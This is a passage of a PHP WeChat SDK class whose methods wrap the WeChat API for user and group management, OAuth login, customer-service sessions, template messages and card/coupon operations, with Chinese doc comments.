$this->http_post(self::API_BASE_URL_PREFIX.self::$DATACUBE_URL_ARR[$type][$subtype].\'access_token=\'.$this->access_token,self::json_encode($data)); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return isset($json[\'list\'])?$json[\'list\']:$json; } return false; } /** * 批量获取关注用户列表 * @param unknown $next_openid */ public function getUserList($next_openid=\'\'){ if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_get(self::API_URL_PREFIX.self::USER_GET_URL.\'access_token=\'.$this->access_token.\'&next_openid=\'.$next_openid); if ($result) { $json = json_decode($result,true); if (isset($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 获取关注者详细信息 * @param string $openid * @return array {subscribe,openid,nickname,sex,city,province,country,language,headimgurl,subscribe_time,[unionid]} * 注意:unionid字段 只有在用户将公众号绑定到微信开放平台账号后,才会出现。建议调用前用isset()检测一下 */ public function getUserInfo($openid){ if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_get(self::API_URL_PREFIX.self::USER_INFO_URL.\'access_token=\'.$this->access_token.\'&openid=\'.$openid); if ($result) { $json = json_decode($result,true); if (isset($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 设置用户备注名 * @param string $openid * @param string $remark 备注名 * @return boolean|array */ public function updateUserRemark($openid,$remark){ if (!$this->access_token && !$this->checkAuth()) return false; $data = array( \'openid\'=>$openid, \'remark\'=>$remark ); $result = $this->http_post(self::API_URL_PREFIX.self::USER_UPDATEREMARK_URL.\'access_token=\'.$this->access_token,self::json_encode($data)); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 获取用户分组列表 * @return boolean|array */ public function getGroup(){ if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_get(self::API_URL_PREFIX.self::GROUP_GET_URL.\'access_token=\'.$this->access_token); if ($result) { $json = json_decode($result,true); if (isset($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 获取用户所在分组 * @param string $openid * @return boolean|int 成功则返回用户分组id */ public function getUserGroup($openid){ if (!$this->access_token && !$this->checkAuth()) return false; $data = array( \'openid\'=>$openid ); $result = $this->http_post(self::API_URL_PREFIX.self::USER_GROUP_URL.\'access_token=\'.$this->access_token,self::json_encode($data)); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } else if (isset($json[\'groupid\'])) return $json[\'groupid\']; } return false; } /** * 新增自定分组 * @param string $name 分组名称 * @return boolean|array */ public function createGroup($name){ if (!$this->access_token && !$this->checkAuth()) return false; $data = array( \'group\'=>array(\'name\'=>$name) ); $result = $this->http_post(self::API_URL_PREFIX.self::GROUP_CREATE_URL.\'access_token=\'.$this->access_token,self::json_encode($data)); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 更改分组名称 * @param int $groupid 分组id * @param string $name 分组名称 * @return boolean|array */ public function updateGroup($groupid,$name){ if (!$this->access_token && !$this->checkAuth()) return false; $data = array( \'group\'=>array(\'id\'=>$groupid,\'name\'=>$name) ); $result = $this->http_post(self::API_URL_PREFIX.self::GROUP_UPDATE_URL.\'access_token=\'.$this->access_token,self::json_encode($data)); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 移动用户分组 * @param int $groupid 分组id * @param string $openid 用户openid * @return boolean|array */ public function updateGroupMembers($groupid,$openid){ if (!$this->access_token && !$this->checkAuth()) return false; $data = array( \'openid\'=>$openid, \'to_groupid\'=>$groupid ); $result = $this->http_post(self::API_URL_PREFIX.self::GROUP_MEMBER_UPDATE_URL.\'access_token=\'.$this->access_token,self::json_encode($data)); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 批量移动用户分组 * @param int $groupid 分组id * @param string $openid_list 用户openid数组,一次不能超过50个 * @return boolean|array */ public function batchUpdateGroupMembers($groupid,$openid_list){ if (!$this->access_token && !$this->checkAuth()) return false; $data = array( \'openid_list\'=>$openid_list, \'to_groupid\'=>$groupid ); $result = $this->http_post(self::API_URL_PREFIX.self::GROUP_MEMBER_BATCHUPDATE_URL.\'access_token=\'.$this->access_token,self::json_encode($data)); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 发送客服消息 * @param array $data 消息结构{"touser":"OPENID","msgtype":"news","news":{...}} * @return boolean|array */ public function sendCustomMessage($data){ if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_post(self::API_URL_PREFIX.self::CUSTOM_SEND_URL.\'access_token=\'.$this->access_token,self::json_encode($data)); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * oauth 授权跳转接口 * @param string $callback 回调URI * @return string */ public function getOauthRedirect($callback,$state=\'\',$scope=\'snsapi_userinfo\'){ return self::OAUTH_PREFIX.self::OAUTH_AUTHORIZE_URL.\'appid=\'.$this->appid.\'&redirect_uri=\'.urlencode($callback).\'&response_type=code&scope=\'.$scope.\'&state=\'.$state.\'#wechat_redirect\'; } /** * 通过code获取Access Token * @return array {access_token,expires_in,refresh_token,openid,scope} */ public function getOauthAccessToken(){ $code = isset($_GET[\'code\'])?$_GET[\'code\']:\'\'; if (!$code) return false; $result = $this->http_get(self::API_BASE_URL_PREFIX.self::OAUTH_TOKEN_URL.\'appid=\'.$this->appid.\'&secret=\'.$this->appsecret.\'&code=\'.$code.\'&grant_type=authorization_code\'); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } $this->user_token = $json[\'access_token\']; return $json; } return false; } /** * 刷新access token并续期 * @param string $refresh_token * @return boolean|mixed */ public function getOauthRefreshToken($refresh_token){ $result = $this->http_get(self::API_BASE_URL_PREFIX.self::OAUTH_REFRESH_URL.\'appid=\'.$this->appid.\'&grant_type=refresh_token&refresh_token=\'.$refresh_token); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } $this->user_token = $json[\'access_token\']; return $json; } return false; } /** * 获取授权后的用户资料 * @param string $access_token * @param string $openid * @return array {openid,nickname,sex,province,city,country,headimgurl,privilege,[unionid]} * 注意:unionid字段 只有在用户将公众号绑定到微信开放平台账号后,才会出现。建议调用前用isset()检测一下 */ public function getOauthUserinfo($access_token,$openid){ $result = $this->http_get(self::API_BASE_URL_PREFIX.self::OAUTH_USERINFO_URL.\'access_token=\'.$access_token.\'&openid=\'.$openid); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 检验授权凭证是否有效 * @param string $access_token * @param string $openid * @return boolean 是否有效 */ public function getOauthAuth($access_token,$openid){ $result = $this->http_get(self::API_BASE_URL_PREFIX.self::OAUTH_AUTH_URL.\'access_token=\'.$access_token.\'&openid=\'.$openid); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } else if ($json[\'errcode\']==0) return true; } return false; } /** * 模板消息 设置所属行业 * @param int $id1 公众号模板消息所属行业编号,参看官方开发文档 行业代码 * @param int $id2 同$id1。但如果只有一个行业,此参数可省略 * @return boolean|array */ public function setTMIndustry($id1,$id2=\'\'){ if ($id1) $data[\'industry_id1\'] = $id1; if ($id2) $data[\'industry_id2\'] = $id2; if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_post(self::API_URL_PREFIX.self::TEMPLATE_SET_INDUSTRY_URL.\'access_token=\'.$this->access_token,self::json_encode($data)); if($result){ $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 模板消息 添加消息模板 * 成功返回消息模板的调用id * @param string $tpl_id 模板库中模板的编号,有“TM**”和“OPENTMTM**”等形式 * @return boolean|string */ public function addTemplateMessage($tpl_id){ $data = array (\'template_id_short\' =>$tpl_id); if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_post(self::API_URL_PREFIX.self::TEMPLATE_ADD_TPL_URL.\'access_token=\'.$this->access_token,self::json_encode($data)); if($result){ $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json[\'template_id\']; } return false; } /** * 发送模板消息 * @param array $data 消息结构 * { "touser":"OPENID", "template_id":"ngqIpbwh8bUfcSsECmogfXcV14J0tQlEpBO27izEYtY", "url":"http://weixin.qq.com/download", "topcolor":"#FF0000", "data":{ "参数名1": { "value":"参数", "color":"#173177" //参数颜色 }, "Date":{ "value":"06月07日 19时24分", "color":"#173177" }, "CardNumber":{ "value":"0426", "color":"#173177" }, "Type":{ "value":"消费", "color":"#173177" } } } * @return boolean|array */ public function sendTemplateMessage($data){ if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_post(self::API_URL_PREFIX.self::TEMPLATE_SEND_URL.\'access_token=\'.$this->access_token,self::json_encode($data)); if($result){ $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 获取多客服会话记录 * @param array $data 数据结构{"starttime":123456789,"endtime":987654321,"openid":"OPENID","pagesize":10,"pageindex":1,} * @return boolean|array */ public function getCustomServiceMessage($data){ if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_post(self::API_URL_PREFIX.self::CUSTOM_SERVICE_GET_RECORD.\'access_token=\'.$this->access_token,self::json_encode($data)); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 转发多客服消息 * Example: $obj->transfer_customer_service($customer_account)->reply(); * @param string $customer_account 转发到指定客服帐号:test1@test */ public function transfer_customer_service($customer_account = \'\') { $msg = array( \'ToUserName\' => $this->getRevFrom(), \'FromUserName\'=>$this->getRevTo(), \'CreateTime\'=>time(), \'MsgType\'=>\'transfer_customer_service\', ); if ($customer_account) { $msg[\'TransInfo\'] = array(\'KfAccount\'=>$customer_account); } $this->Message($msg); return $this; } /** * 获取多客服客服基本信息 * * @return boolean|array */ public function getCustomServiceKFlist(){ if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_get(self::API_URL_PREFIX.self::CUSTOM_SERVICE_GET_KFLIST.\'access_token=\'.$this->access_token); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 获取多客服在线客服接待信息 * * @return boolean|array { "kf_online_list": [ { "kf_account": "test1@test", //客服账号@微信别名 "status": 1, //客服在线状态 1:pc在线,2:手机在线,若pc和手机同时在线则为 1+2=3 "kf_id": "1001", //客服工号 "auto_accept": 0, //客服设置的最大自动接入数 "accepted_case": 1 //客服当前正在接待的会话数 } ] } */ public function getCustomServiceOnlineKFlist(){ if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_get(self::API_URL_PREFIX.self::CUSTOM_SERVICE_GET_ONLINEKFLIST.\'access_token=\'.$this->access_token); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 创建指定多客服会话 * @tutorial 当用户已被其他客服接待或指定客服不在线则会失败 * @param string $openid //用户openid * @param string $kf_account //客服账号 * @param string $text //附加信息,文本会展示在客服人员的多客服客户端,可为空 * @return boolean | array //成功返回json数组 * { * "errcode": 0, * "errmsg": "ok", * } */ public function createKFSession($openid,$kf_account,$text=\'\'){ $data=array( "openid" =>$openid, "kf_account" => $kf_account ); if ($text) $data["text"] = $text; if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_post(self::API_BASE_URL_PREFIX.self::CUSTOM_SESSION_CREATE.\'access_token=\'.$this->access_token,self::json_encode($data)); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 关闭指定多客服会话 * @tutorial 当用户被其他客服接待时则会失败 * @param string $openid //用户openid * @param string $kf_account //客服账号 * @param string $text //附加信息,文本会展示在客服人员的多客服客户端,可为空 * @return boolean | array //成功返回json数组 * { * "errcode": 0, * "errmsg": "ok", * } */ public function closeKFSession($openid,$kf_account,$text=\'\'){ $data=array( "openid" =>$openid, "kf_account" => $kf_account ); if ($text) $data["text"] = $text; if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_post(self::API_BASE_URL_PREFIX.self::CUSTOM_SESSION_CLOSE .\'access_token=\'.$this->access_token,self::json_encode($data)); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 获取用户会话状态 * @param string $openid //用户openid * @return boolean | array //成功返回json数组 * { * "errcode" : 0, * "errmsg" : "ok", * "kf_account" : "test1@test", //正在接待的客服 * "createtime": 123456789, //会话接入时间 * } */ public function getKFSession($openid){ if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_get(self::API_BASE_URL_PREFIX.self::CUSTOM_SESSION_GET .\'access_token=\'.$this->access_token.\'&openid=\'.$openid); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 获取指定客服的会话列表 * @param string $openid //用户openid * @return boolean | array //成功返回json数组 * array( * \'sessionlist\' => array ( * array ( * \'openid\'=>\'OPENID\', //客户 openid * \'createtime\'=>123456789, //会话创建时间,UNIX 时间戳 * ), * array ( * \'openid\'=>\'OPENID\', //客户 openid * \'createtime\'=>123456789, //会话创建时间,UNIX 时间戳 * ), * ) * ) */ public function getKFSessionlist($kf_account){ if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_get(self::API_BASE_URL_PREFIX.self::CUSTOM_SESSION_GET_LIST .\'access_token=\'.$this->access_token.\'&kf_account=\'.$kf_account); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 获取未接入会话列表 * @param string $openid //用户openid * @return boolean | array //成功返回json数组 * array ( * \'count\' => 150 , //未接入会话数量 * \'waitcaselist\' => array ( * array ( * \'openid\'=>\'OPENID\', //客户 openid * \'kf_account \' =>\'\', //指定接待的客服,为空则未指定 * \'createtime\'=>123456789, //会话创建时间,UNIX 时间戳 * ), * array ( * \'openid\'=>\'OPENID\', //客户 openid * \'kf_account \' =>\'\', //指定接待的客服,为空则未指定 * \'createtime\'=>123456789, //会话创建时间,UNIX 时间戳 * ) * ) * ) */ public function getKFSessionWait(){ if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_get(self::API_BASE_URL_PREFIX.self::CUSTOM_SESSION_GET_WAIT .\'access_token=\'.$this->access_token); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 添加客服账号 * * @param string $account //完整客服账号,格式为:账号前缀@公众号微信号,账号前缀最多10个字符,必须是英文或者数字字符 * @param string $nickname //客服昵称,最长6个汉字或12个英文字符 * @param string $password //客服账号明文登录密码,会自动加密 * @return boolean|array * 成功返回结果 * { * "errcode": 0, * "errmsg": "ok", * } */ public function addKFAccount($account,$nickname,$password){ $data=array( "kf_account" =>$account, "nickname" => $nickname, "password" => md5($password) ); if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_post(self::API_BASE_URL_PREFIX.self::CS_KF_ACCOUNT_ADD_URL.\'access_token=\'.$this->access_token,self::json_encode($data)); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 修改客服账号信息 * * @param string $account //完整客服账号,格式为:账号前缀@公众号微信号,账号前缀最多10个字符,必须是英文或者数字字符 * @param string $nickname //客服昵称,最长6个汉字或12个英文字符 * @param string $password //客服账号明文登录密码,会自动加密 * @return boolean|array * 成功返回结果 * { * "errcode": 0, * "errmsg": "ok", * } */ public function updateKFAccount($account,$nickname,$password){ $data=array( "kf_account" =>$account, "nickname" => $nickname, "password" => md5($password) ); if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_post(self::API_BASE_URL_PREFIX.self::CS_KF_ACCOUNT_UPDATE_URL.\'access_token=\'.$this->access_token,self::json_encode($data)); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 删除客服账号 * * @param string $account //完整客服账号,格式为:账号前缀@公众号微信号,账号前缀最多10个字符,必须是英文或者数字字符 * @return boolean|array * 成功返回结果 * { * "errcode": 0, * "errmsg": "ok", * } */ public function deleteKFAccount($account){ if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_get(self::API_BASE_URL_PREFIX.self::CS_KF_ACCOUNT_DEL_URL.\'access_token=\'.$this->access_token.\'&kf_account=\'.$account); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 上传客服头像 * * @param string $account //完整客服账号,格式为:账号前缀@公众号微信号,账号前缀最多10个字符,必须是英文或者数字字符 * @param string $imgfile //头像文件完整路径,如:\'D:\user.jpg\'。头像文件必须JPG格式,像素建议640*640 * @return boolean|array * 成功返回结果 * { * "errcode": 0, * "errmsg": "ok", * } */ public function setKFHeadImg($account,$imgfile){ if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_post(self::API_BASE_URL_PREFIX.self::CS_KF_ACCOUNT_UPLOAD_HEADIMG_URL.\'access_token=\'.$this->access_token.\'&kf_account=\'.$account,array(\'media\'=>\'@\'.$imgfile),true); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 语义理解接口 * @param String $uid 用户唯一id(非开发者id),用户区分公众号下的不同用户(建议填入用户openid) * @param String $query 输入文本串 * @param String $category 需要使用的服务类型,多个用“,”隔开,不能为空 * @param Float $latitude 纬度坐标,与经度同时传入;与城市二选一传入 * @param Float $longitude 经度坐标,与纬度同时传入;与城市二选一传入 * @param String $city 城市名称,与经纬度二选一传入 * @param String $region 区域名称,在城市存在的情况下可省略;与经纬度二选一传入 * @return boolean|array */ public function querySemantic($uid,$query,$category,$latitude=0,$longitude=0,$city="",$region=""){ if (!$this->access_token && !$this->checkAuth()) return false; $data=array( \'query\' => $query, \'category\' => $category, \'appid\' => $this->appid, \'uid\' => \'\' ); //地理坐标或城市名称二选一 if ($latitude) { $data[\'latitude\'] = $latitude; $data[\'longitude\'] = $longitude; } elseif ($city) { $data[\'city\'] = $city; } elseif ($region) { $data[\'region\'] = $region; } $result = $this->http_post(self::API_BASE_URL_PREFIX.self::SEMANTIC_API_URL.\'access_token=\'.$this->access_token,self::json_encode($data)); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 创建卡券 * @param Array $data 卡券数据 * @return array|boolean 返回数组中card_id为卡券ID */ public function createCard($data) { if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_post(self::API_BASE_URL_PREFIX . self::CARD_CREATE . \'access_token=\' . $this->access_token, self::json_encode($data)); if ($result) { $json = json_decode($result, true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 更改卡券信息 * 调用该接口更新信息后会重新送审,卡券状态变更为待审核。已被用户领取的卡券会实时更新票面信息。 * @param string $data * @return boolean */ public function updateCard($data) { if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_post(self::API_BASE_URL_PREFIX . self::CARD_UPDATE . \'access_token=\' . $this->access_token, self::json_encode($data)); if ($result) { $json = json_decode($result, true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return true; } return false; } /** * 删除卡券 * 允许商户删除任意一类卡券。删除卡券后,该卡券对应已生成的领取用二维码、添加到卡包 JS API 均会失效。 * 注意:删除卡券不能删除已被用户领取,保存在微信客户端中的卡券,已领取的卡券依旧有效。 * @param string $card_id 卡券ID * @return boolean */ public function delCard($card_id) { $data = array( \'card_id\' => $card_id, ); if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_post(self::API_BASE_URL_PREFIX . self::CARD_DELETE . \'access_token=\' . $this->access_token, self::json_encode($data)); if ($result) { $json = json_decode($result, true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return true; } return false; } /** * 查询卡券详情 * @param string $card_id * @return boolean|array 返回数组信息比较复杂,请参看卡券接口文档 */ public function getCardInfo($card_id) { $data = array( \'card_id\' => $card_id, ); if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_post(self::API_BASE_URL_PREFIX . self::CARD_GET . \'access_token=\' . $this->access_token, self::json_encode($data)); if ($result) { $json = json_decode($result, true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 获取颜色列表 * 获得卡券的最新颜色列表,用于创建卡券 * @return boolean|array 返回数组请参看 微信卡券接口文档 的json格式 */ public function getCardColors() { if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_get(self::API_BASE_URL_PREFIX . self::CARD_GETCOLORS . \'access_token=\' . $this->access_token); if ($result) { $json = json_decode($result, true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 拉取门店列表 * 获取在公众平台上申请创建的门店列表 * @param int $offset 开始拉取的偏移,默认为0从头开始 * @param int $count 拉取的数量,默认为0拉取全部 * @return boolean|array 返回数组请参看 微信卡券接口文档 的json格式 */ public function getCardLocations($offset=0,$count=0) { $data=array( \'offset\'=>$offset, \'count\'=>$count ); if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_post(self::API_BASE_URL_PREFIX . self::CARD_LOCATION_BATCHGET . \'access_token=\' . $this->access_token, self::json_encode($data)); if ($result) { $json = json_decode($result, true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 批量导入门店信息 * @tutorial 返回插入的门店id列表,以逗号分隔。如果有插入失败的,则为-1,请自行核查是哪个插入失败 * @param array $data 数组形式的json数据,由于内容较多,具体内容格式请查看 微信卡券接口文档 * @return boolean|string 成功返回插入的门店id列表 */ public function addCardLocations($data) { if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_post(self::API_BASE_URL_PREFIX . self::CARD_LOCATION_BATCHADD . \'access_token=\' . $this->access_token, self::json_encode($data)); if ($result) { $json = json_decode($result, true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 生成卡券二维码 * 成功则直接返回ticket值,可以用 getQRUrl($ticket) 换取二维码url * * @param string $cardid 卡券ID 必须 * @param string $code 指定卡券 code 码,只能被领一次。use_custom_code 字段为 true 的卡券必须填写,非自定义 code 不必填写。 * @param string $openid 指定领取者的 openid,只有该用户能领取。bind_openid 字段为 true 的卡券必须填写,非自定义 openid 不必填写。 * @param int $expire_seconds 指定二维码的有效时间,范围是 60 ~ 1800 秒。不填默认为永久有效。 * @param boolean $is_unique_code 指定下发二维码,生成的二维码随机分配一个 code,领取后不可再次扫描。填写 true 或 false。默认 false。 * @param string $balance 红包余额,以分为单位。红包类型必填(LUCKY_MONEY),其他卡券类型不填。 * @return boolean|string */ public function createCardQrcode($card_id,$code=\'\',$openid=\'\',$expire_seconds=0,$is_unique_code=false,$balance=\'\') { $card = array( \'card_id\' => $card_id ); $data = array( \'action_name\' => "QR_CARD" ); if ($code) $card[\'code\'] = $code; if ($openid) $card[\'openid\'] = $openid; if ($is_unique_code) $card[\'is_unique_code\'] = $is_unique_code; if ($balance) $card[\'balance\'] = $balance; if ($expire_seconds) $data[\'expire_seconds\'] = $expire_seconds; $data[\'action_info\'] = array(\'card\' => $card); if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_post(self::API_BASE_URL_PREFIX . self::CARD_QRCODE_CREATE . \'access_token=\' . $this->access_token, self::json_encode($data)); if ($result) { $json = json_decode($result, true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 消耗 code * 自定义 code(use_custom_code 为 true)的优惠券,在 code 被核销时,必须调用此接口。 * * @param string $code 要消耗的序列号 * @param string $card_id 要消耗序列号所述的 card_id,创建卡券时use_custom_code 填写 true 时必填。 * @return boolean|array * { * "errcode":0, * "errmsg":"ok", * "card":{"card_id":"pFS7Fjg8kV1IdDz01r4SQwMkuCKc"}, * "openid":"oFS7Fjl0WsZ9AMZqrI80nbIq8xrA" * } */ public function consumeCardCode($code,$card_id=\'\') { $data = array(\'code\' => $code); if ($card_id) $data[\'card_id\'] = $card_id; if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_post(self::API_BASE_URL_PREFIX . self::CARD_CODE_CONSUME . \'access_token=\' . $this->access_token, self::json_encode($data)); if ($result) { $json = json_decode($result, true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * code 解码 * @param string $encrypt_code 通过 choose_card_info 获取的加密字符串 * @return boolean|array * { * "errcode":0, * "errmsg":"ok", * "code":"751234212312" * } */ public function decryptCardCode($encrypt_code) { $data = array( \'encrypt_code\' => $encrypt_code, ); if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_post(self::API_BASE_URL_PREFIX . self::CARD_CODE_DECRYPT . \'access_token=\' . $this->access_token, self::json_encode($data)); if ($result) { $json = json_decode($result, true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 查询 code 的有效性(非自定义 code) * @param string $code * @return boolean|array * { * "errcode":0, * "errmsg":"ok", * "openid":"oFS7Fjl0WsZ9AMZqrI80nbIq8xrA", //用户 openid * "card":{ * "card_id":"pFS7Fjg8kV1IdDz01r4SQwMkuCKc", * "begin_time": 1404205036, //起始使用时间 * "end_time": 1404205036, //结束时间 * } * } */ public function checkCardCode($code) { $data = array( \'code\' => $code, ); if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_post(self::API_BASE_URL_PREFIX . self::CARD_CODE_GET . \'access_token=\' . $this->access_token, self::json_encode($data)); if ($result) { $json = json_decode($result, true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 批量查询卡列表 * @param $offset 开始拉取的偏移,默认为0从头开始 * @param $count 需要查询的卡片的数量(数量最大50,默认50) * @return boolean|array * { * "errcode":0, * "errmsg":"ok", * "card_id_list":["ph_gmt7cUVrlRk8swPwx7aDyF-pg"], //卡 id 列表 * "total_num":1 //该商户名下 card_id 总数 * } */ public function getCardIdList($offset=0,$count=50) { if ($count>50) $count = 50; $data = array( \'offset\' => $offset, \'count\' => $count, ); if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_post(self::API_BASE_URL_PREFIX . self::CARD_BATCHGET . \'access_token=\' . $this->access_token, self::json_encode($data)); if ($result) { $json = json_decode($result, true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 更改 code * 为确保转赠后的安全性,微信允许自定义code的商户对已下发的code进行更改。 * 